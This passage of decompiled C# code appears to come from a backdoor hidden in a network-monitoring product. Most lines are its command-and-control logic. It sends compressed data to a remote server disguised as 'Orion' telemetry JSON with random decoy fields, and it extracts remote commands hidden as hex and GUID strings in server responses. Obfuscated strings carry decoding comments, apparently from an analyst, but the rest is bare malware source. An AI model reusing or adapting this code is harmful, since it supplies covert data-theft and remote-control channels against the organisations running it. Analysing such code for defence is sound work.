byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
Array.Copy(bytes, array2, bytes.Length);
Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
array = HttpHelper.Inflate(array2);
httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
}
if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
{
text = Uri.UriSchemeHttps + "://" + text;
}
if (!text.EndsWith("/"))
{
text += "/";
}
text += this.GetBaseUri(httpOipExMethods, err);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
{
// If-None-Match
httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
{
int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
int num = 0;
ulong num2 = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
num2 -= 300000UL;
string text2 = "{";
// "userId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
// "sessionId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[]
{
'{',
'}'
}));
// "steps":[
text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
for (int i = 0; i < intArray.Length; i++)
{
uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
num2 += (ulong)num3;
byte[] array3;
if (intArray[i] > 0)
{
num2 |= 2UL;
array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
num += intArray[i];
}
else
{
num2 &= 18446744073709551613UL;
array3 = new byte[this.random.Next(16, 28)];
for (int j = 0; j < array3.Length; j++)
{
array3[j] = (byte)this.random.Next();
}
}
text2 += "{";
// "Timestamp":"\/Date({0})\/",
text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
string str = text2;
// "Index":{0},
string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
int num4 = this.mIndex;
this.mIndex = num4 + 1;
text2 = str + string.Format(format, num4);
// "EventType":"Orion",
text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
// "EventName":"EventManager",
text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
// "DurationMs":{0},
text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
// "Succeeded":true,
text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
// "Message":"{0}"
text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
text2 += ((i + 1 != intArray.Length) ? "}," : "}");
}
text2 += "]}";
// application/json
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
array = Encoding.UTF8.GetBytes(text2);
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
{
// application/octet-stream
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
}
return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
}
catch (Exception)
{
}
return((HttpStatusCode)0);
}
private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
{
args = null;
try
{
if (body == null || body.Length < 4)
{
return(HttpHelper.JobEngine.None);
}
HttpOipMethods httpOipMethods = this.requestMethod;
if (httpOipMethods != HttpOipMethods.Put)
{
if (httpOipMethods != HttpOipMethods.Post)
{
// "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase)
select m.Value).ToArray <string>();
body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
}
else
{
body = body.Skip(12).ToArray <byte>();
}
}
else
{
body = body.Skip(48).ToArray <byte>();
}
int num = BitConverter.ToInt32(body, 0);
body = body.Skip(4).Take(num).ToArray <byte>();
if (body.Length != num)
{
return(HttpHelper.JobEngine.None);
}
string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[]
{
' '
}, 2);
HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
args = ((array.Length > 1) ? array[1] : null);
return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
}
catch (Exception)
{
}
return(HttpHelper.JobEngine.None);
}